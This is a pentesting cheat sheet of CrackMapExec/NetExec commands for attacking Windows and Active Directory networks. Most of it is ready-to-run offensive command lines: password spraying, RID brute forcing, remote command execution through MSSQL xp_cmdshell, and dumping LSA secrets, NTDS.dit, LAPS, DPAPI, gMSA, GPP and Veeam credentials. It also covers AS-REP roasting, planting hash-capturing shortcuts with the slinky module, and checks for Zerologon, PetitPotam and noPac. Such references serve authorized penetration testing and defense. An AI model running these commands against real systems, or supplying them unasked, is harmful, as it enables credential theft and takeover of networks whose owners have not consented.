A cheat sheet for CrackMapExec and NetExec, featuring useful commands and modules for different services, for use during pentesting.

CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec (no longer maintained)

NetExec: https://github.com/Pennyw0rth/NetExec

Installation: https://www.netexec.wiki/getting-started/installation

The crackmapexec commands below also work with NetExec.

Other names: cme, nxc

Enumeration

Initial Enumeration

crackmapexec smb target

Null Authentication

crackmapexec smb target -u '' -p ''

Guest Authentication

crackmapexec smb target -u 'guest' -p ''

List Shares

crackmapexec smb target -u '' -p '' --shares
crackmapexec smb target -u username -p password --shares

List Usernames

crackmapexec smb target -u '' -p '' --users
crackmapexec smb target -u '' -p '' --rid-brute
crackmapexec smb target -u username -p password --users

Local Authentication

crackmapexec smb target -u username -p password --local-auth

Using Kerberos

crackmapexec smb target -u username -p password -k

Check for hosts that have SMB signing disabled

crackmapexec smb target(s) --gen-relay-list relay.txt

Spraying

Password Spray

crackmapexec smb target -u users.txt -p password --continue-on-success
crackmapexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
crackmapexec ssh target(s) -u username -p password --continue-on-success

SMB

All In One

crackmapexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol

Spider_plus Module

crackmapexec smb target -u username -p password -M spider_plus
crackmapexec smb target -u username -p password -M spider_plus -o READ_ONLY=false

Dump a specific file

crackmapexec smb target -u username -p password -k --get-file target_file output_file --share sharename

LDAP

Enumerate users using LDAP

crackmapexec ldap target -u '' -p '' --users

All In One

crackmapexec ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groups

MSSQL

Authentication

crackmapexec mssql target -u username -p password

Execute commands using xp_cmdshell

Use -X for PowerShell and -x for cmd

crackmapexec mssql target -u username -p password -x command_to_execute

Get a file

crackmapexec mssql target -u username -p password --get-file target_file output_file

Secrets Dump

Dump LSA secrets

crackmapexec smb target -u username -p password --local-auth --lsa

gMSA

crackmapexec ldap target -u username -p password --gmsa-convert-id id
crackmapexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account

Group Policy Preferences

crackmapexec smb target -u username -p password -M gpp_password

Dump LAPS password

crackmapexec smb target -u username -p password --laps

Dump DPAPI credentials

crackmapexec smb target -u username -p password --laps --dpapi

Dump NTDS.dit

crackmapexec smb target -u username -p password --ntds

Asreproast

crackmapexec ldap target -u username -p password --asreproast asrep.txt

Bloodhound

crackmapexec ldap target -u username -p password --bloodhound -ns ip --collection All

Useful Modules

Webdav

Checks whether the WebClient service is running on the target

crackmapexec smb ip -u username -p password -M webdav

Veeam

Extracts credentials from the local Veeam SQL database

crackmapexec smb target -u username -p password -M veeam

slinky

Creates Windows shortcuts whose icon attribute contains a UNC path to the specified SMB server, in all shares with write permissions

crackmapexec smb ip -u username -p password -M slinky

ntdsutil

Dump NTDS with ntdsutil

crackmapexec smb ip -u username -p password -M ntdsutil

ldap-checker

Checks whether LDAP signing and binding are required and/or enforced

cme ldap target -u username -p password -M ldap-checker

Check whether the DC is vulnerable to Zerologon, PetitPotam, or noPac

crackmapexec smb target -u username -p password -M zerologon
crackmapexec smb target -u username -p password -M petitpotam
crackmapexec smb target -u username -p password -M nopac

Check the MachineAccountQuota

crackmapexec ldap target -u username -p password -M maq

ADCS Enumeration

crackmapexec ldap target -u username -p password -M adcs